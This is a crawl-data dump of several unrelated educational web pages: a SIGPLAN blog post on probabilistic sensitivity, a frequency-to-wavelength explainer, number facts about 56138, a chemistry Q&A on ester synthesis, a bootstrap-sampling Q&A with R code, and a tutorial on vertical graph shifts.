transformer.\n\nThe initial observation behind our work is that predicate transformers can also be generalized to reason about sensitivity of probabilistic programs using the Kantorovich distance. More precisely, we can construct a transformer that receives as an input a distance", null, "$d$ and an imperative probabilistic program", null, "$C$ and two initial memories and it provides an upper bound of the Kantorovich distance", null, "$K(d)$ between the two output distributions of", null, "$C$.\n\nLet us be more formal. A relational expectation is a map", null, "$E \\colon M \\times M \\to [0,\\infty]$ from pairs of memories to the positive reals (note that distances are particular cases of relational expectations). In our paper we introduce a novel relational pre-expectation transformer,", null, "${\\rm rpe}$. It receives a program", null, "$C$, and a relational expectation", null, "$d$, and it returns a relational expectation", null, "${\\rm rpe}(C,d)$ such that, for any pair of input memories", null, "$m_1,m_2$, it satisfies the inequality", null, "$K(d)(C(m_1),C(m_2)) \\leq {\\rm rpe}(C,d)(m_1,m_2)$, where", null, "$C$ on the left side is interpreted as a map", null, "$C \\colon M \\to {\\rm Distr}(M)$.\n\nThis transformer is a direct analogue of other predicate transformers. It is defined by induction on the structure of the program, i.e., we define", null, "${\\rm rpe}(C,d)$ for every atomic command", null, "$C$, and for composition we have", null, "${\\rm rpe}(C_1; C_2, e) = {\\rm rpe}(C_1,{\\rm rpe}(C_2,e))$ . The", null, "${\\rm rpe}$ for a while loop is defined by a fixed point equation and can be approximated by using a generalized notion of invariants.\n\nAs with other transformers, such as the weakest pre-expectation or the expected runtime transformer, most of the explicit reasoning about probabilities is abstracted away, and is only needed for sampling commands. By choosing an appropriate distance", null, "$d$ between memories, our transformer can be used to reason about several notions of probabilistic sensitivity.\n\nFinally, readers may have noticed that we have not claimed anything about the precision of the sensitivity bounds our transformer computes. Indeed,", null, "${\\rm rpe}(C,f)$ does not always provide the tightest bound possible. This is due to some technicalities about the way the Kantorovich distance composes. Nonetheless, we have not observed significant gaps in practice between our analysis and other analyses of probabilistic sensitivity.\n\n# Applications: Stability of stochastic gradient descent and convergence of Markov chains\n\nOne of the core algorithms in machine learning is the gradient descent algorithm. This algorithm uses a data set of labelled examples to train a classifier to label new, unseen examples. The classical deterministic algorithm iterates over all examples in the training set and adjusts the parameters of the classifier so that they minimize a loss function, which measures how good the classifier is at labeling examples. These datasets, however, are often massive, and training a classifier can be computationally expensive.\n\nThe idea behind the stochastic gradient descent algorithm (SGD) is that we can instead choose a few examples at random, train the classifier only with these examples, and still obtain a classifier that performs similarly as another trained with the full data set.\n\nThe SGD algorithm satisfies a property called stability: when running SGD on two adjacent training sets (meaning that they differ in a single data point), the resulting classifiers have a similar expected loss in new examples. This means that it generalizes: it should perform well on unseen examples and it limits how much it can overfit the training set.\n\nThis is a sensitivity property: it can be specified by two distances. On the input space, we can use an adjacency distance measuring the number of differing examples between two data sets. Between the outputs, we define a distance measuring the absolute difference between expected losses. This property can then be verified by our expectation transformer, as we show in our paper.\n\nAnother interesting application of our technique is verifying the rate of convergence of Markov chains. This is also a case of sensitivity, since it depends on the distance to a stationary distribution. This has several interesting applications, such as determining the efficiency of algorithms based on Markov Chain Montecarlo\n\nIf you are interested in seeing more details and applications, please read our distinguished POPL 2021 paper.\n\nBio: Alejandro Aguirre is a postdoc at Aarhus University in the Logic and Semantics group. He works on developing logics to reason about probabilistic programs, with an emphasis on relational properties.\n\nAcknowledgements: The author would like to thank Gilles Barthe, Justin Hsu and Todd Millstein for the helpful feedback on preliminary versions of this post. This post is based on joint work with Gilles Barthe, Justin Hsu, Benjamin Kaminski, Joost-Pieter Katoen, and Christoph Matheja.\n\nDisclaimer: These posts are written by individual contributors to share their thoughts on the SIGPLAN blog for the benefit of the community. Any views or opinions represented in this blog are personal, belong solely to the blog author and do not represent those of ACM SIGPLAN or its parent organization, ACM." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9161494,"math_prob":0.9930788,"size":11243,"snap":"2023-40-2023-50","text_gpt3_token_len":2129,"char_repetition_ratio":0.1505472,"word_repetition_ratio":0.0045095826,"special_character_ratio":0.1811794,"punctuation_ratio":0.09460154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99674094,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T11:28:57Z\",\"WARC-Record-ID\":\"<urn:uuid:f2050639-67f7-471e-a503-760a1948066b>\",\"Content-Length\":\"204236\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9537e9aa-89aa-4a68-93e3-34db4557683c>\",\"WARC-Concurrent-To\":\"<urn:uuid:669a4adc-cd98-4921-8272-e0b4eb69ff34>\",\"WARC-IP-Address\":\"35.215.84.32\",\"WARC-Target-URI\":\"https://blog.sigplan.org/2021/07/15/a-pre-expectation-calculus-for-probabilistic-sensitivity/\",\"WARC-Payload-Digest\":\"sha1:VLRUO4LALMTBO2LQZVIUB5QKV5JXQBX2\",\"WARC-Block-Digest\":\"sha1:PGIGYBH74C4H3INKVKHYV2O3ESL5WZEY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679511159.96_warc_CC-MAIN-20231211112008-20231211142008-00692.warc.gz\"}"}
https://mysqlpreacher.com/what-is-the-wavelength-of-a-750-mhz-signal/
[ "Categories :\n\n## What is the wavelength of a 750 MHz signal?\n\nWavelength (λ) for electromagnetic radiation of frequency 750 MHz in Air is 39.857 cm (centimeter)\n\nHz KHz MHz GHz THz PHz EHz in\n\n## How do you calculate wavelength from MHz?\n\nHow to calculate wavelength\n\n1. Determine the frequency of the wave. For example, f = 10 MHz .\n2. Choose the velocity of the wave.\n3. Substitute these values into the wavelength equation λ = v/f .\n4. Calculate the result.\n5. You can also use this tool as a frequency calculator.\n\nHow do you calculate Wavelenght?\n\nThe wavelength is calculated from the wave speed and frequency by λ = wave speed/frequency, or λ = v / f.\n\nWhat is the frequency of 750 nm?\n\nViolet light has a wavelength of ~400 nm, and a frequency of ~7.5*1014 Hz. Red light has a wavelength of ~700 nm, and a frequency of ~4.3*1014 Hz….The EM spectrum.\n\nType of Radiation Frequency Range (Hz) Wavelength Range\nnear-infrared 1*1014 – 4*1014 2.5 μm – 750 nm\ninfrared 1013 – 1014 25 μm – 2.5 μm\n\n### How long is a 40 Hz wavelength?\n\nWavelength\n\nFrequency in Hz. Wavelength quarter wavelength\n40 28.25 feet\n50 22.6 feet\n63 17.94 feet\n80 14.13 feet\n\n### What is the wavelength of 315 MHz?\n\nWavelength (λ) for electromagnetic radiation of frequency 315 MHz in Air is 94.897 cm (centimeter)\n\nHz KHz MHz GHz THz PHz EHz =? λ (wavelength)\n\nWhat is the wavelength of 1 Hz?\n\n340 m\nWavelength of a sound in air at 1 Hz: 340 m A: These molecules already react to the inward motion of the loudspeaker membrane, moving towards the source.\n\nWhat is the frequency and wavelength?\n\nThe wavelength of a wave is the distance between any two corresponding points on adjacent waves. The frequency, represented by the Greek letter nu (ν), is the number of waves that pass a certain point in a specified amount of time. Typically, frequency is measured in units of cycles per second or waves per second.\n\n#### What is wave frequency?\n\nFrequency is a measurement of how often a recurring event such as a wave occurs in a measured amount of time. Waves can move in two ways. The frequencies of progressive waves or those that move forward indicate how fast a wave moves forward in units of cycles per unit time.\n\n#### What is the frequency of red light whose wavelength is 750 nm?\n\nusing the wave equation. So we can say the frequency lies between 4 and 4.84×1014 Hertz i.e. an extremely narrow range, showing just what a marvellously precise evolutionary structure the human eye is.\n\nWhat is the frequency of red light if its wavelength is 750 nm?\n\nTable of the Wavelengths of Various Colours, and Their Frequencies:\n\nColour Wavelength in nm Frequency in THz\nRed 750 – 610 480 – 405\nOrange 610 – 590 510 – 480\nYellow 590 – 570 530 – 510\nGreen 570 – 500 580 – 530\n\nHow to convert the frequency to the wavelength?\n\nFormulas and equations: c = λ · f λ = c / f = c · T f = c / λ. When rounding the speed of light to 300,000,000 m/s you get: Frequency. Wavelength. 1 MHz = 1,000,000 Hz = 10 6 Hz.\n\n## How to convert megahertz to wavelength in metres?\n\nMegahertz to Wavelength In Metres Conversion Table Megahertz [MHz] Wavelength In Metres [m] 20 MHz 14.9896229 m 50 MHz 5.99584916 m 100 MHz 2.99792458 m 1000 MHz 0.299792458 m\n\n## What is the formula for the speed of light?\n\nFormula: f = C/λ Where, λ (Lambda) = Wavelength in meters c= Speed of Light (299,792,458 m/s) f= Frequency (MHz) Advertisement Other Calculators Frequency to Wavelength Calculator\n\nHow big is the wavelength of 10 GHz?\n\nFrequency Wavelength 1/4 Wavelength 1/20 Wavelength 1/100 Wavelength 3.0 GHz 10 cm 2.5 cm 5.0 mm 1.0 mm 4.0 GHz 7.5 cm 1.88 cm 3.75 mm 0.75 mm 5.0 GHz 6.0 cm 1.5 cm 3.0 mm 0.6 mm 10 GHz 3.0 cm 7.5 mm 1.5 mm 0.3 mm" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8199278,"math_prob":0.9970416,"size":3643,"snap":"2023-14-2023-23","text_gpt3_token_len":1090,"char_repetition_ratio":0.20307776,"word_repetition_ratio":0.047690015,"special_character_ratio":0.32747737,"punctuation_ratio":0.123893805,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9965231,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-03T18:17:30Z\",\"WARC-Record-ID\":\"<urn:uuid:4700ecbc-a8fd-40ac-83c0-ff04e0d8134e>\",\"Content-Length\":\"108599\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b6b09a83-12c6-4d04-b899-5b8b5c9b2473>\",\"WARC-Concurrent-To\":\"<urn:uuid:7500d81d-97b9-421d-b408-3bcfd427da39>\",\"WARC-IP-Address\":\"104.21.74.24\",\"WARC-Target-URI\":\"https://mysqlpreacher.com/what-is-the-wavelength-of-a-750-mhz-signal/\",\"WARC-Payload-Digest\":\"sha1:6GOOXVQLAO6X3S3X5SKKULZMWBJU6YAP\",\"WARC-Block-Digest\":\"sha1:62ZQKZMXJSFL6RINSSCIUYR3QAFQ5BRH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649302.35_warc_CC-MAIN-20230603165228-20230603195228-00090.warc.gz\"}"}
https://metanumbers.com/56138
[ "## 56138\n\n56,138 (fifty-six thousand one hundred thirty-eight) is an even five-digits composite number following 56137 and preceding 56139. In scientific notation, it is written as 5.6138 × 104. The sum of its digits is 23. It has a total of 2 prime factors and 4 positive divisors. There are 28,068 positive integers (up to 56138) that are relatively prime to 56138.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 5\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 56 thousand 138 fifty-six thousand one hundred thirty-eight\n\n## Notation\n\nScientific notation 5.6138 × 104 56.138 × 103\n\n## Prime Factorization of 56138\n\nPrime Factorization 2 × 28069\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 2 Total number of prime factors rad(n) 56138 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 56,138 is 2 × 28069. Since it has a total of 2 prime factors, 56,138 is a composite number.\n\n## Divisors of 56138\n\n1, 2, 28069, 56138\n\n4 divisors\n\n Even divisors 2 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 4 Total number of the positive divisors of n σ(n) 84210 Sum of all the positive divisors of n s(n) 28072 Sum of the proper positive divisors of n A(n) 21052.5 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 236.935 Returns the nth root of the product of n divisors H(n) 2.66657 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 56,138 can be divided by 4 positive divisors (out of which 2 are even, and 2 are odd). The sum of these divisors (counting 56,138) is 84,210, the average is 2,105,2.5.\n\n## Other Arithmetic Functions (n = 56138)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 28068 Total number of positive integers not greater than n that are coprime to n λ(n) 28068 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 5693 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 28,068 positive integers (less than 56,138) that are coprime with 56,138. And there are approximately 5,693 prime numbers less than or equal to 56,138.\n\n## Divisibility of 56138\n\n m n mod m 2 3 4 5 6 7 8 9 0 2 2 3 2 5 2 5\n\nThe number 56,138 is divisible by 2.\n\n• Semiprime\n• Deficient\n\n• Polite\n\n• Square Free\n\n## Base conversion (56138)\n\nBase System Value\n2 Binary 1101101101001010\n3 Ternary 2212000012\n4 Quaternary 31231022\n5 Quinary 3244023\n6 Senary 1111522\n8 Octal 155512\n10 Decimal 56138\n12 Duodecimal 285a2\n20 Vigesimal 706i\n36 Base36 17be\n\n## Basic calculations (n = 56138)\n\n### Multiplication\n\nn×i\n n×2 112276 168414 224552 280690\n\n### Division\n\nni\n n⁄2 28069 18712.7 14034.5 11227.6\n\n### Exponentiation\n\nni\n n2 3151475044 176917506020072 9931794952954801936 557551105068976671083168\n\n### Nth Root\n\ni√n\n 2√n 236.935 38.29 15.3927 8.90946\n\n## 56138 as geometric shapes\n\n### Circle\n\n Diameter 112276 352725 9.90065e+09\n\n### Sphere\n\n Volume 7.4107e+14 3.96026e+10 352725\n\n### Square\n\nLength = n\n Perimeter 224552 3.15148e+09 79391.1\n\n### Cube\n\nLength = n\n Surface area 1.89089e+10 1.76918e+14 97233.9\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 168414 1.36463e+09 48616.9\n\n### Triangular Pyramid\n\nLength = n\n Surface area 5.45851e+09 2.08499e+13 45836.5\n\n## Cryptographic Hash Functions\n\nmd5 36b204e2f1feac040d9ea2c2275c5f70 e6369dbbbd28088b7a79619cc10b14cb3ec6e8db 499e80b9204229551c25bee6b1a2e98749d84dd1b81ca5350adfff6f1fc856f1 a806ce0ae442de4bde14998ff9fecec2c4519f32e9f1d33dd18dffe0cbbac0c5608699a5afcb66b64ff9c98c1eb6cdce5b3df51a49449e9f7efc624c9420dc96 65d09f626ccf3dbe367738ee1358e3608d3a4ec5" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60733765,"math_prob":0.98554003,"size":4505,"snap":"2020-34-2020-40","text_gpt3_token_len":1603,"char_repetition_ratio":0.11975116,"word_repetition_ratio":0.028528528,"special_character_ratio":0.45038846,"punctuation_ratio":0.07881137,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9951822,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-14T19:41:34Z\",\"WARC-Record-ID\":\"<urn:uuid:7a77eec2-6a2c-4151-a6fd-e0c8671eef9a>\",\"Content-Length\":\"47696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2c52d311-4d75-435f-bddb-8e060d9bd45b>\",\"WARC-Concurrent-To\":\"<urn:uuid:49d0cbd8-2e6a-40cb-a11d-eadbd16eed87>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/56138\",\"WARC-Payload-Digest\":\"sha1:FDOOG7ZO74N4NWOMO5VYZWD5PBVYCVVL\",\"WARC-Block-Digest\":\"sha1:FEXJX3NSWTMPVL3A52OVBY6Y5IJUMI4J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739370.8_warc_CC-MAIN-20200814190500-20200814220500-00350.warc.gz\"}"}
https://chemistry.stackexchange.com/questions/116642/dcc-coupling-of-n-hydroxysuccinimide-and-2-2-dimethoxyacetic-acid/116650
[ "# DCC coupling of N-hydroxysuccinimide and 2,2-dimethoxyacetic acid\n\nI am forming N-hydroxysuccinimide ester (1) by DCC coupling with N-hydroxysuccinimide and 2,2-dimethoxyacetic acid using distilled THF as solvent.", null, "What I see on $$\\ce{^1H}$$-NMR is three major singlets: $$\\delta~\\pu{4.840 ppm}~(1\\ce{H}),$$ $$\\delta~\\pu{3.432 ppm}~(7.26\\ce{H}),$$ $$\\delta ~\\pu{2.731 ppm}~(6.36\\ce{H})$$ and some impurities.\n\nWhile the chemical shifts are well-aligned with theoretical predictions (in my opinion), integration ratios do not quite make sense. I wish I could purify it to have a clearer NMR spectrum and see whether I actually have the desired product, but I don't think my ester will stay stable in silica in column chromatography. Any suggestions?\n\n• Maybe take or get an NMR of the reagents and theoretical side products and see if there can be any overlap with the signals you see. I'm not sure I understand what your doubt is, though. NMR integration is not always very precise, especially for acidic protons. – user6376297 Jun 10 '19 at 15:17\n• What is your next reaction with this product? – Waylander Jun 10 '19 at 15:18\n• @user6376297 I have already taken the NMR of 2,2-Dimethoxy Acetic acid: $\\delta \\: \\pu{4.867 ppm}$ (1H) and $\\delta \\: \\pu{3.4615 ppm}$ (6.6H) (c.f. $\\delta \\: \\pu{4.840 ppm}$ (1H) and $\\delta \\: \\pu{3.432 ppm}$ (7.26H) in my product NMR) Not sure whether I can argue that peaks have 'shifted' in the product NMR – chemrese Jun 11 '19 at 3:37\n\nIf peaks for \"some impurities\" are appear around $$\\delta \\: \\pu{1.8 ppm}$$, I assume you have residual THF in your crude product. The other multiplet of THF is probably burried under $$\\delta \\: \\pu{3.43 ppm}$$ resonance. That would confirmed by your impurity integration, which should be equal to 1H unit equivalence. If I'm right, your 6.36H unit equivalence is actually overlap one of $$\\ce{CH3}$$-resonance and one of $$\\ce{CH2}$$-resonance.\nOn the other hand, the two resonances at $$\\delta \\: \\pu{3.43 ppm}$$ and $$\\delta \\: \\pu{2.73 ppm}$$ would very well be representing two $$\\ce{CH3}$$-groups and (two $$\\ce{CH2}$$-groups + part of THF impurity), respectively, as well." ]
[ null, "https://i.stack.imgur.com/6pUMD.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90674436,"math_prob":0.9920017,"size":671,"snap":"2021-04-2021-17","text_gpt3_token_len":207,"char_repetition_ratio":0.089955024,"word_repetition_ratio":0.0,"special_character_ratio":0.27868852,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98075944,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-21T21:45:31Z\",\"WARC-Record-ID\":\"<urn:uuid:eee0f2bd-c774-48fe-bcab-dc7ccb9dd9ff>\",\"Content-Length\":\"152456\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7d71f608-0787-4038-88c9-1174f65cb541>\",\"WARC-Concurrent-To\":\"<urn:uuid:9366c06c-808c-4a85-9213-fe6ae666336d>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/116642/dcc-coupling-of-n-hydroxysuccinimide-and-2-2-dimethoxyacetic-acid/116650\",\"WARC-Payload-Digest\":\"sha1:53OROGYYPRCNFYR4VK6JF6IRBR2TYXWD\",\"WARC-Block-Digest\":\"sha1:SRFEEYBINDDZCYR56FYSWELI2WMS3FO2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703527850.55_warc_CC-MAIN-20210121194330-20210121224330-00177.warc.gz\"}"}
https://stats.stackexchange.com/questions/373658/number-of-bootstrap-samples-to-construct-confidence-interval-in-mixed-models
[ "# Number of bootstrap samples to construct confidence interval in mixed models [duplicate]\n\nlibrary(lme4)\nlibrary(merTools)\ndata(sleepstudy)\nfm1 <- lmer(Reaction ~ Days + (Days|Subject), data=sleepstudy)\nPI <- predictInterval(merMod = fm1, newdata = sleepstudy,\nlevel = 0.95, n.sims = 1000,\nstat = \"median\", type=\"linear.prediction\",\ninclude.resid.var = TRUE)\n\n\nMy question is: is there a rule of thumb of what the value of n.sims should be?\n\nEDIT\n\nMy data contains 20686 rows (i.e. 20686 response variables) and 20 predictors. For such dataset, how many bootstrap samples are required? Is there any plots or papers that I can refer to that explain the number of bootstrap samples as a function of data size?\n\n• More is better. Bootstrapping takes random subsamples with replacement, so the more often you do this, the smaller the chance your results are affected by the stochastic nature of this approach. For your final model you should do whatever number of bootstrap samples $$B$$ is still computationally feasible.\n• If your data set is very large, or your model very complex, then $$B=1,000$$ may be prohibitively large for simple trial and error, so you could start with a lower number, bearing in mind that the variance will be larger.\nFor example, if $$B=1,000$$ takes 10 minutes to run on your system, then simply halving to $$B=500$$ will already allow you to do twice as much trial and error in the same time. Your final comparisons could then be run overnight with a much larger number (e.g. $$B=10,000$$).\n• Try running bootstrap with e.g. $10$ samples, not to draw any conclusions from it, but just to figure out how well your computer/server is handling that. Based on that you can decide how many bootstrap samples you want to use for initial trial and error. Once you know which models you want to compare, run them with a larger number of bootstrap samples. Oct 25, 2018 at 9:12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7673116,"math_prob":0.9851315,"size":612,"snap":"2023-40-2023-50","text_gpt3_token_len":167,"char_repetition_ratio":0.098684214,"word_repetition_ratio":0.0,"special_character_ratio":0.2777778,"punctuation_ratio":0.17355372,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9871025,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T20:11:27Z\",\"WARC-Record-ID\":\"<urn:uuid:6aecab40-603f-40ce-b921-d1f39b83d61d>\",\"Content-Length\":\"145524\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:766b8bad-d032-4142-b1de-3de64cc817f1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6cd56b96-fe03-4c46-8236-14d77365a3ee>\",\"WARC-IP-Address\":\"172.64.144.30\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/373658/number-of-bootstrap-samples-to-construct-confidence-interval-in-mixed-models\",\"WARC-Payload-Digest\":\"sha1:VQHZI7AIR5WALDYBEDVB262URP2AXYEX\",\"WARC-Block-Digest\":\"sha1:WXU3WWHBRXSPIY52DWETREKPZNXXVYP2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100304.52_warc_CC-MAIN-20231201183432-20231201213432-00763.warc.gz\"}"}
https://scienceplusplus.com/graph-fx-to-fx-%C2%B1-a/
[ "", null, "# Graph f(x) to f(x) ± a\n\nContent-\n\n## Graph : f(x) -> f(x) ± a\n\nIn mathematics  , Graph is pictorial representation of data or values in an organized manner.\n\nIn graph , the point in ordered in the graph related to another point. So , actually points on the graph related to each other.\n\nWe are advised to student to study this section carefully ,because it gives a very short approaches to various lengthy problem in competitive examination.\n\nTransformation :\n\n1 .       f(x) to f(x) ± a , when f(x) is given\n\nWhere  ‘a’ is positive constant.\n\n1.1     f(x) —>  f(x) + a\n\nHere ‘a’ upward shifting in f(x).\n\nSo , shift the given graph of f(x)  ‘a’  unit upward.", null, "1.2     f(x) —>  f(x) – a\n\nHere ‘a’ downward shifting in f(x).\n\nSo , shift the given  graph of f(x)  ‘a’  unit downward.", null, "## Example 1. Draw graph :\n\n##### 1.  y = ex\n\nWe know that\n\ny = ex  is  an exponential function & it is plotted  like as—", null, "### 2. y = ex+ 1\n\nf(x) —> f(x) +a , when f(x) is given\n\nHere f(x) = ex\n\nTo draw  y = ex + 1  ,\n\n+1 unit upward shifting\n\nSo , graph  look like as —", null, "#### 3.  y = ex – 1\n\nf(x) —> f(x) – a , when f(x) is given\n\nHere f(x) = ex\n\nTo draw  y = ex – 1  ,\n\n– 1 unit downward shifting\n\nSo , graph is look like as —", null, "Example 2.  Draw graph —\n\n1.   y = | x |\n2. y  = | x | + 1\n3. y  = | x | – 1\n1. #### y = | x |\n\nWe know that\n\ny = |x|   is  an modulus function & it can plotted  like  as—\n\ny = | x | = -x  for x <0\n\ny = | x | =  x  for x > 0", null, "#### 2.  y = |x| + 1\n\nf(x) —> f(x) +a , when f(x) is given\n\nHere f(x) =  | x |\n\nTo draw  y =  |x |+ 1  ,  1 unit upward shifting\n\nSo , graph  look like as —\n\ny = | x | + 1  = -x + 1 , for x <0\n\ny = | x | + 1  =  x + 1 , for x > 0", null, "### 3.  y = |x| – 1\n\nf(x) —> f(x) – a , when f(x) is given\n\nHere f(x) = |x|\n\nTo draw  y = |x| – 1  ,  1 unit downward shifting\n\nSo , graph  look like as —\n\ny = | x | + 1  = -x – 1 , for x <0\n\ny = | x | + 1  =  x – 1 , for x > 0", null, "error: Content is protected !!" ]
[ null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/fxa.001.jpeg", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/fx-a.001.jpeg", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/y-ex-.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex-1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx-1.001.png", null ]
